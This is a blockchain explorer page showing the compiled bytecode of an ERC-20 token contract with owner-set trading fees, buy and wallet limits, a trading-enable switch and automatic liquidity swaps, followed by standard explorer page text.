052600436106102135760003560e01c806370db69d611610118578063a9059cbb116100a0578063d8bd2dd11161006f578063d8bd2dd1146105d4578063dd62ed3e14610604578063e4fdf79f1461064a578063f2fde38b1461066a578063f8b45b051461068a57600080fd5b8063a9059cbb1461055e578063c816841b1461057e578063d257b34f1461059e578063d4fbfdfc146105be57600080fd5b806381905bf8116100e757806381905bf8146104c657806385ecafd7146104e65780638a8c523c146105165780638da5cb5b1461052b57806395d89b411461054957600080fd5b806370db69d61461044d578063715018a614610463578063735de9f71461047857806374c4ff96146104b057600080fd5b806323b872dd1161019b57806346469afb1161016a57806346469afb146103b557806361e0c0f7146103cb57806366c08ccc146103e157806366ca9b83146103f757806370a082311461041757600080fd5b806323b872dd1461033e5780632740c1971461035e578063313ce5671461037e5780634415fb61146103a057600080fd5b80631a8145bb116101e25780631a8145bb146102bb5780631bff7898146102d15780631f3fed8f146102e75780632369bf83146102fd578063238dafe01461031d57600080fd5b806302dbd8f81461021f57806306fdde0314610241578063095ea7b31461026c57806318160ddd1461029c57600080fd5b3661021a57005b600080fd5b34801561022b57600080fd5b5061023f61023a3660046117cc565b6106a0565b005b34801561024d57600080fd5b50610256610705565b60405161026391906117ee565b60405180910390f35b34801561027857600080fd5b5061028c610287366004611858565b610797565b6040519015158152602001610263565b3480156102a857600080fd5b506004545b604051908152602001610263565b3480156102c757600080fd5b506102ad60135481565b3480156102dd57600080fd5b506102ad60105481565b3480156102f357600080fd5b506102ad60145481565b34801561030957600080fd5b5061023f610318366004611884565b6107ad565b34801561032957600080fd5b5060155461028c90600160a01b900460ff1681565b34801561034a57600080fd5b5061028c6103593660046118a8565b6107f9565b34801561036a57600080fd5b5061023f6103793660046117cc565b6108a3565b34801561038a57600080fd5b5060075460405160ff9091168152602001610263565b3480156103ac57600080fd5b5061023f6108f4565b3480156103c157600080fd5b506102ad600d5481565b3480156103d757600080fd5b506102ad600e5481565b3480156103ed57600080fd5b506102ad60125481565b34801561040357600080fd5b5061023f6104123660046117cc565b61092b565b34801561042357600080fd5b506102ad610432366004611884565b6001600160a01b031660009081526002602052604090205490565b34801561045957600080fd5b506102ad60175481565b34801561046f57600080fd5b5061023f610987565b34801561048457600080fd5b50601654610498906001600160a01b031681565b6040516001600160a01b039091168152602001610263565b3480156104bc57600080fd5b506102ad600f5481565b3480156104d257600080fd5b5061023f6104e13660046118e9565b6109bd565b3480156104f257600080fd5b5061028c610501366004611884565b601a6020526000908152604090205460ff1681565b34801561052257600080fd5b5061023f610a12565b34801561053757600080fd5b506001546001600160a01b0316610498565b34801561055557600080fd5b50610256610ab0565b34801561056a57600080fd5b5061028c610579366004611858565b610abf565b34801561058a57600080fd5b50601554610498906001600160a01b031681565b3480156105aa57600080fd5b5061028c6105b9366004611927565b610acc565b3480156105ca57600080fd5b506102ad60115481565b3480156105e057600080fd5b5061028c6105ef366004611884565b60196020526000908152604090205460ff1681565b34801561061057600080fd5b506102ad61061f366004611940565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b34801561065657600080fd5b5061023f610665366004611927565b610c14565b34801561067657600080fd5b5061023f610685366004611884565b610c43565b34801561069657600080fd5b506102ad60185481565b6001546001600160a01b031633146106d35760405162461bcd60e51b81526004016106ca9061196e565b60405180910390fd5b600a6106df82846119b9565b11156106ea57600080fd5b601282905560118190556106fe81836119b9565b6010555050565b606060058054610714906119d1565b80601f0160208091040260200160405190810160405280929190818152602001828054610740906119d1565b801561078d5780601f106107625761010080835404028352916020019161078d565b820191906000526020600020905b81548152906001019060200180831161077057829003601f168201915b5050505050905090565b60006107a4338484610cde565b50600192915050565b6001546001600160a01b031633146107d75760405162461bcd60e51b81526004016106ca9061196e565b600980546001600160a01b0319166001600160a01b0392909216919091179055565b6000610806848484610e02565b6001600160a01b03841660009081526003602090815260408083203384529091529020548281101561088b5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084016106ca565b6108988533858403610cde565b506001949350505050565b6001546001600160a01b031633146108cd5760405162461bcd60e51b81526004016106ca9061196e565b600a8211156108db57600080fd5b600a8111156108e957600080fd5b600d91909155601055565b6001546001600160a01b0316331461091e5760405162461bcd60e51b81526004016106ca9061196e565b6004546017819055601855565b6001546001600160a01b031633146109555760405162461bcd60e51b81526004016106ca9061196e565b600a61096182846119b9565b111561096c57600080fd5b600f829055600e81905561098081836119b9565b600d555050565b6001546001600160a01b031633146109b15760405162461bcd60e51b81526004016106ca9061196e565b6109bb60006113cf565b565b6001546001600160a01b031633146109e75760405162461bcd60e51b81526004016106ca9061196e565b6001600160a01b03919091166000908152601960205260409020805460ff1916911515919091179055565b6001546001600160a01b03163314610a3c5760405162461bcd60e51b81526004016106ca9061196e565b601554600160a01b900460ff1615610a885760405162461bcd60e51b815260206004820152600f60248201526e185b1c9958591e48195b98589b1959608a1b60448201526064016106ca565b6015805460ff60a01b1916600160a01b179055600c805461ff00191661010017905542600855565b606060068054610714906119d1565b60006107a4338484610e02565b6001546000906001600160a01b03163314610af95760405162461bcd60e51b81526004016106ca9061196e565b620186a06004546001610b0c9190611a0c565b610b169190611a2b565b821015610b835760405162461bcd60e51b815260206004820152603560248201527f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60448201527410181718181892903a37ba30b61039bab838363c9760591b60648201526084016106ca565b6103e86004546005610b959190611a0c565b610b9f9190611a2b565b821115610c0b5760405162461bcd60e51b815260206004820152603460248201527f5377617020616d6f756e742063616e6e6f742062652068696768657220746861604482015273371018171a92903a37ba30b61039bab838363c9760611b60648201526084016106ca565b50600b55600190565b6001546001600160a01b03163314610c3e5760405162461bcd60e51b81526004016106ca9061196e565b600a55565b6001546001600160a01b03163314610c6d5760405162461bcd60e51b81526004016106ca9061196e565b6001600160a01b038116610cd25760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016106ca565b610cdb816113cf565b50565b6001600160a01b038316610d405760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016106ca565b6001600160a01b038216610da15760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016106ca565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831660009081526002602052604090205481811015610e6b5760405162461bcd60e51b815260206004820152601f60248201527f7472616e7366657220616d6f756e7420657863656564732062616c616e63650060448201526064016106ca565b601554600160a01b900460ff1680610e9b57506001600160a01b03841660009081526019602052604090205460ff165b80610ebe57506001600160a01b03831660009081526019602052604090205460ff165b610efc5760405162461bcd60e51b815260206004820152600f60248201526e1b9bdd08195b98589b1959081e595d608a1b60448201526064016106ca565b60155482906001600160a01b038681169116141561111857600a54600854610f2491906119b9565b42108015610f4b57506001600160a01b03841660009081526019602052604090205460ff16155b1561100057601754831115610f955760405162461bcd60e51b815260206004820152601060248201526f6578636565646564206d61782062757960801b60448201526064016106ca565b6018546001600160a01b038516600090815260026020526040902054610fbc9085906119b9565b11156110005760405162461bcd60e51b8152602060048201526013602482015272195e18d959591959081b585e081dd85b1b195d606a1b60448201526064016106ca565b6001600160a01b0384166000908152601a602052604090205460ff166111135760006064600d54856110329190611a0c565b61103c9190611a2b565b90506110488185611a4d565b3060009081526002602052604081208054929450839290919061106c9084906119b9565b9091555050600d54600f546110819083611a0c565b61108b9190611a2b565b6013600082825461109c91906119b9565b9091555050600d54600e546110b19083611a0c565b6110bb9190611a2b565b601460008282546110cc91906119b9565b909155505060405181815230906001600160a01b038816907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3505b611334565b6015546001600160a01b038581169116141561133457600a5460085461113e91906119b9565b4210801561116557506001600160a01b03851660009081526019602052604090205460ff16155b15611210576017548311156111ae5760405162461bcd60e51b815260206004820152600f60248201526e0caf0c6cacac8cac840dac2f040e8f608b1b60448201526064016106ca565b30600090815260026020526040902054600b54811080159081906111d95750600c54610100900460ff165b80156111e85750600c5460ff16155b1561120d57600c805460ff19166001179055611202611421565b600c805460ff191690555b50505b600c5460ff1615801561123c57506001600160a01b0385166000908152601a602052604090205460ff16155b156113345760006064601054856112539190611a0c565b61125d9190611a2b565b90506112698185611a4d565b3060009081526002602052604081208054929450839290919061128d9084906119b9565b9091555050600d546012546112a29083611a0c565b6112ac9190611a2b565b601360008282546112bd91906119b9565b9091555050600d546011546112d29083611a0c565b6112dc9190611a2b565b601460008282546112ed91906119b9565b909155505060405181815230906001600160a01b038816907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3505b61133e8383611a4d565b6001600160a01b0380871660009081526002602052604080822093909355908616815290812080548392906113749084906119b9565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516113c091815260200190565b60405180910390a35050505050565b600180546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b306000908152600260205260408120546014546013549192918291611445916119b9565b90508261145157505050565b600b5461145f906014611a0c565b83111561147757600b54611474906014611a0c565b92505b600060026010546012548661148c9190611a0c565b6114969190611a2b565b6114a09190611a2b565b905060006114ae8286611a4d565b9050476114ba826115c0565b60006114c68247611a4d565b9050600085601454836114d99190611a0c565b6114e39190611a2b565b905060006114f18284611a4d565b6000601381905560148190556009546040519293506001600160a01b031691849181818185875af1925050503d8060008114611549576040519150601f19603f3d011682016040523d82523d6000602084013e61154e565b606091505b509098505085158015906115625750600081115b156115b557611571868261171a565b601354604080518781526020810184905280820192909252517f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5619181900360600190a15b505050505050505050565b60408051600280825260608201835260009260208301908036833701905050905030816000815181106115f5576115f5611a64565b6001600160a01b03928316602091820292909201810191909152601654604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa15801561164e573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906116729190611a7a565b8160018151811061168557611685611a64565b6001600160a01b0392831660209182029290920101526016546116ab9130911684610cde565b60165460405163791ac94760e01b81526001600160a01b039091169063791ac947906116e4908590600090869030904290600401611a97565b600060405180830381600087803b1580156116fe57600080fd5b505af1158015611712573d6000803e3d6000fd5b505050505050565b6016546117329030906001600160a01b031684610cde565b60165460405163f305d71960e01b815230600482015260248101849052600060448201819052606482015261dead60848201524260a48201526001600160a01b039091169063f305d71990839060c40160606040518083038185885af11580156117a0573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906117c59190611b08565b5050505050565b600080604083850312156117df57600080fd5b50508035926020909101359150565b600060208083528351808285015260005b8181101561181b578581018301518582016040015282016117ff565b8181111561182d576000604083870101525b50601f01601f1916929092016040019392505050565b6001600160a01b0381168114610cdb57600080fd5b6000806040838503121561186b57600080fd5b823561187681611843565b946020939093013593505050565b60006020828403121561189657600080fd5b81356118a181611843565b9392505050565b6000806000606084860312156118bd57600080fd5b83356118c881611843565b925060208401356118d881611843565b929592945050506040919091013590565b600080604083850312156118fc57600080fd5b823561190781611843565b91506020830135801515811461191c57600080fd5b809150509250929050565b60006020828403121561193957600080fd5b5035919050565b6000806040838503121561195357600080fd5b823561195e81611843565b9150602083013561191c81611843565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b600082198211156119cc576119cc6119a3565b500190565b600181811c908216806119e557607f821691505b60208210811415611a0657634e487b7160e01b600052602260045260246000fd5b50919050565b6000816000190483118215151615611a2657611a266119a3565b500290565b600082611a4857634e487b7160e01b600052601260045260246000fd5b500490565b600082821015611a5f57611a5f6119a3565b500390565b634e487b7160e01b600052603260045260246000fd5b600060208284031215611a8c57600080fd5b81516118a181611843565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611ae75784516001600160a01b031683529383019391830191600101611ac2565b50506001600160a01b03969096166060850152505050608001529392505050565b600080600060608486031215611b1d57600080fd5b835192506020840151915060408401519050925092509256fea2646970667358221220a87ef7f68da96a5b3ec0b87d184a7f4c676a46693507923120fcb63a01b25dd064736f6c634300080a0033
Deployed Bytecode
0x6080604052600436106102135760003560e01c806370db69d611610118578063a9059cbb116100a0578063d8bd2dd11161006f578063d8bd2dd1146105d4578063dd62ed3e14610604578063e4fdf79f1461064a578063f2fde38b1461066a578063f8b45b051461068a57600080fd5b8063a9059cbb1461055e578063c816841b1461057e578063d257b34f1461059e578063d4fbfdfc146105be57600080fd5b806381905bf8116100e757806381905bf8146104c657806385ecafd7146104e65780638a8c523c146105165780638da5cb5b1461052b57806395d89b411461054957600080fd5b806370db69d61461044d578063715018a614610463578063735de9f71461047857806374c4ff96146104b057600080fd5b806323b872dd1161019b57806346469afb1161016a57806346469afb146103b557806361e0c0f7146103cb57806366c08ccc146103e157806366ca9b83146103f757806370a082311461041757600080fd5b806323b872dd1461033e5780632740c1971461035e578063313ce5671461037e5780634415fb61146103a057600080fd5b80631a8145bb116101e25780631a8145bb146102bb5780631bff7898146102d15780631f3fed8f146102e75780632369bf83146102fd578063238dafe01461031d57600080fd5b806302dbd8f81461021f57806306fdde0314610241578063095ea7b31461026c57806318160ddd1461029c57600080fd5b3661021a57005b600080fd5b34801561022b57600080fd5b5061023f61023a3660046117cc565b6106a0565b005b34801561024d57600080fd5b50610256610705565b60405161026391906117ee565b60405180910390f35b34801561027857600080fd5b5061028c610287366004611858565b610797565b6040519015158152602001610263565b3480156102a857600080fd5b506004545b604051908152602001610263565b3480156102c757600080fd5b506102ad60135481565b3480156102dd57600080fd5b506102ad60105481565b3480156102f357600080fd5b506102ad60145481565b34801561030957600080fd5b5061023f610318366004611884565b6107ad565b34801561032957600080fd5b5060155461028c90600160a01b900460ff1681565b34801561034a57600080fd5b5061028c6103593660046118a8565b6107f9565b34801561036a57600080fd5b5061023f6103793660046117cc565b6108a3565b34801561038a57600080fd5b5060075460405160ff9091168152602001610263565b3480156103ac57600080fd5b5061023f6108f4565b3480156103c157600080fd5b506102ad600d5481565b3480156103d757600080fd5b506102ad600e5481565b3480156103ed57600080fd5b506102ad60125481565b34801561040357600080fd5b5061023f6104123660046117cc565b61092b565b34801561042357600080fd5b506102ad610432366004611884565b6001600160a01b031660009081526002602052604090205490565b34801561045957600080fd5b506102ad60175481565b34801561046f57600080fd5b5061023f610987565b34801561048457600080fd5b50601654610498906001600160a01b031681565b6040516001600160a01b039091168152602001610263565b3480156104bc57600080fd5b506102ad600f5481565b3480156104d257600080fd5b5061023f6104e13660046118e9565b6109bd565b3480156104f257600080fd5b5061028c610501366004611884565b601a6020526000908152604090205460ff1681565b34801561052257600080fd5b5061023f610a12565b34801561053757600080fd5b506001546001600160a01b0316610498565b34801561055557600080fd5b50610256610ab0565b34801561056a57600080fd5b5061028c610579366004611858565b610abf565b34801561058a57600080fd5b50601554610498906001600160a01b031681565b3480156105aa57600080fd5b5061028c6105b9366004611927565b610acc565b3480156105ca57600080fd5b506102ad60115481565b3480156105e057600080fd5b5061028c6105ef366004611884565b60196020526000908152604090205460ff1681565b34801561061057600080fd5b506102ad61061f366004611940565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b34801561065657600080fd5b5061023f610665366004611927565b610c14565b34801561067657600080fd5b5061023f610685366004611884565b610c43565b34801561069657600080fd5b506102ad60185481565b6001546001600160a01b031633146106d35760405162461bcd60e51b81526004016106ca9061196e565b60405180910390fd5b600a6106df82846119b9565b11156106ea57600080fd5b601282905560118190556106fe81836119b9565b6010555050565b606060058054610714906119d1565b80601f0160208091040260200160405190810160405280929190818152602001828054610740906119d1565b801561078d5780601f106107625761010080835404028352916020019161078d565b820191906000526020600020905b81548152906001019060200180831161077057829003601f168201915b5050505050905090565b60006107a4338484610cde565b50600192915050565b6001546001600160a01b031633146107d75760405162461bcd60e51b81526004016106ca9061196e565b600980546001600160a01b0319166001600160a01b0392909216919091179055565b6000610806848484610e02565b6001600160a01b03841660009081526003602090815260408083203384529091529020548281101561088b5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084016106ca565b6108988533858403610cde565b506001949350505050565b6001546001600160a01b031633146108cd5760405162461bcd60e51b81526004016106ca9061196e565b600a8211156108db57600080fd5b600a8111156108e957600080fd5b600d91909155601055565b6001546001600160a01b0316331461091e5760405162461bcd60e51b81526004016106ca9061196e565b6004546017819055601855565b6001546001600160a01b031633146109555760405162461bcd60e51b81526004016106ca9061196e565b600a61096182846119b9565b111561096c57600080fd5b600f829055600e81905561098081836119b9565b600d555050565b6001546001600160a01b031633146109b15760405162461bcd60e51b81526004016106ca9061196e565b6109bb60006113cf565b565b6001546001600160a01b031633146109e75760405162461bcd60e51b81526004016106ca9061196e565b6001600160a01b03919091166000908152601960205260409020805460ff1916911515919091179055565b6001546001600160a01b03163314610a3c5760405162461bcd60e51b81526004016106ca9061196e565b601554600160a01b900460ff1615610a885760405162461bcd60e51b815260206004820152600f60248201526e185b1c9958591e48195b98589b1959608a1b60448201526064016106ca565b6015805460ff60a01b1916600160a01b179055600c805461ff00191661010017905542600855565b606060068054610714906119d1565b60006107a4338484610e02565b6001546000906001600160a01b03163314610af95760405162461bcd60e51b81526004016106ca9061196e565b620186a06004546001610b0c9190611a0c565b610b169190611a2b565b821015610b835760405162461bcd60e51b815260206004820152603560248201527f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60448201527410181718181892903a37ba30b61039bab838363c9760591b60648201526084016106ca565b6103e86004546005610b959190611a0c565b610b9f9190611a2b565b821115610c0b5760405162461bcd60e51b815260206004820152603460248201527f5377617020616d6f756e742063616e6e6f742062652068696768657220746861604482015273371018171a92903a37ba30b61039bab838363c9760611b60648201526084016106ca565b50600b55600190565b6001546001600160a01b03163314610c3e5760405162461bcd60e51b81526004016106ca9061196e565b600a55565b6001546001600160a01b03163314610c6d5760405162461bcd60e51b81526004016106ca9061196e565b6001600160a01b038116610cd25760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016106ca565b610cdb816113cf565b50565b6001600160a01b038316610d405760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016106ca565b6001600160a01b038216610da15760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016106ca565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831660009081526002602052604090205481811015610e6b5760405162461bcd60e51b815260206004820152601f60248201527f7472616e7366657220616d6f756e7420657863656564732062616c616e63650060448201526064016106ca565b601554600160a01b900460ff1680610e9b57506001600160a01b03841660009081526019602052604090205460ff165b80610ebe57506001600160a01b03831660009081526019602052604090205460ff165b610efc5760405162461bcd60e51b815260206004820152600f60248201526e1b9bdd08195b98589b1959081e595d608a1b60448201526064016106ca565b60155482906001600160a01b038681169116141561111857600a54600854610f2491906119b9565b42108015610f4b57506001600160a01b03841660009081526019602052604090205460ff16155b1561100057601754831115610f955760405162461bcd60e51b815260206004820152601060248201526f6578636565646564206d61782062757960801b60448201526064016106ca565b6018546001600160a01b038516600090815260026020526040902054610fbc9085906119b9565b11156110005760405162461bcd60e51b8152602060048201526013602482015272195e18d959591959081b585e081dd85b1b195d606a1b60448201526064016106ca565b6001600160a01b0384166000908152601a602052604090205460ff166111135760006064600d54856110329190611a0c565b61103c9190611a2b565b90506110488185611a4d565b3060009081526002602052604081208054929450839290919061106c9084906119b9565b9091555050600d54600f546110819083611a0c565b61108b9190611a2b565b6013600082825461109c91906119b9565b9091555050600d54600e546110b19083611a0c565b6110bb9190611a2b565b601460008282546110cc91906119b9565b909155505060405181815230906001600160a01b038816907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3505b611334565b6015546001600160a01b038581169116141561133457600a5460085461113e91906119b9565b4210801561116557506001600160a01b03851660009081526019602052604090205460ff16155b15611210576017548311156111ae5760405162461bcd60e51b815260206004820152600f60248201526e0caf0c6cacac8cac840dac2f040e8f608b1b60448201526064016106ca565b30600090815260026020526040902054600b54811080159081906111d95750600c54610100900460ff165b80156111e85750600c5460ff16155b1561120d57600c805460ff19166001179055611202611421565b600c805460ff191690555b50505b600c5460ff1615801561123c57506001600160a01b0385166000908152601a602052604090205460ff16155b156113345760006064601054856112539190611a0c565b61125d9190611a2b565b90506112698185611a4d565b3060009081526002602052604081208054929450839290919061128d9084906119b9565b9091555050600d546012546112a29083611a0c565b6112ac9190611a2b565b601360008282546112bd91906119b9565b9091555050600d546011546112d29083611a0c565b6112dc9190611a2b565b601460008282546112ed91906119b9565b909155505060405181815230906001600160a01b038816907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3505b61133e8383611a4d565b6001600160a01b0380871660009081526002602052604080822093909355908616815290812080548392906113749084906119b9565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516113c091815260200190565b60405180910390a35050505050565b600180546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b306000908152600260205260408120546014546013549192918291611445916119b9565b90508261145157505050565b600b5461145f906014611a0c565b83111561147757600b54611474906014611a0c565b92505b600060026010546012548661148c9190611a0c565b6114969190611a2b565b6114a09190611a2b565b905060006114ae8286611a4d565b9050476114ba826115c0565b60006114c68247611a4d565b9050600085601454836114d99190611a0c565b6114e39190611a2b565b905060006114f18284611a4d565b6000601381905560148190556009546040519293506001600160a01b031691849181818185875af1925050503d8060008114611549576040519150601f19603f3d011682016040523d82523d6000602084013e61154e565b606091505b509098505085158015906115625750600081115b156115b557611571868261171a565b601354604080518781526020810184905280820192909252517f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5619181900360600190a15b505050505050505050565b60408051600280825260608201835260009260208301908036833701905050905030816000815181106115f5576115f5611a64565b6001600160a01b03928316602091820292909201810191909152601654604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa15801561164e573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906116729190611a7a565b8160018151811061168557611685611a64565b6001600160a01b0392831660209182029290920101526016546116ab9130911684610cde565b60165460405163791ac94760e01b81526001600160a01b039091169063791ac947906116e4908590600090869030904290600401611a97565b600060405180830381600087803b1580156116fe57600080fd5b505af1158015611712573d6000803e3d6000fd5b505050505050565b6016546117329030906001600160a01b031684610cde565b60165460405163f305d71960e01b815230600482015260248101849052600060448201819052606482015261dead60848201524260a48201526001600160a01b039091169063f305d71990839060c40160606040518083038185885af11580156117a0573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906117c59190611b08565b5050505050565b600080604083850312156117df57600080fd5b50508035926020909101359150565b600060208083528351808285015260005b8181101561181b578581018301518582016040015282016117ff565b8181111561182d576000604083870101525b50601f01601f1916929092016040019392505050565b6001600160a01b0381168114610cdb57600080fd5b6000806040838503121561186b57600080fd5b823561187681611843565b946020939093013593505050565b60006020828403121561189657600080fd5b81356118a181611843565b9392505050565b6000806000606084860312156118bd57600080fd5b83356118c881611843565b925060208401356118d881611843565b929592945050506040919091013590565b600080604083850312156118fc57600080fd5b823561190781611843565b91506020830135801515811461191c57600080fd5b809150509250929050565b60006020828403121561193957600080fd5b5035919050565b6000806040838503121561195357600080fd5b823561195e81611843565b9150602083013561191c81611843565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b600082198211156119cc576119cc6119a3565b500190565b600181811c908216806119e557607f821691505b60208210811415611a0657634e487b7160e01b600052602260045260246000fd5b50919050565b6000816000190483118215151615611a2657611a266119a3565b500290565b600082611a4857634e487b7160e01b600052601260045260246000fd5b500490565b600082821015611a5f57611a5f6119a3565b500390565b634e487b7160e01b600052603260045260246000fd5b600060208284031215611a8c57600080fd5b81516118a181611843565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611ae75784516001600160a01b031683529383019391830191600101611ac2565b50506001600160a01b03969096166060850152505050608001529392505050565b600080600060608486031215611b1d57600080fd5b835192506020840151915060408401519050925092509256fea2646970667358221220a87ef7f68da96a5b3ec0b87d184a7f4c676a46693507923120fcb63a01b25dd064736f6c634300080a0033
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.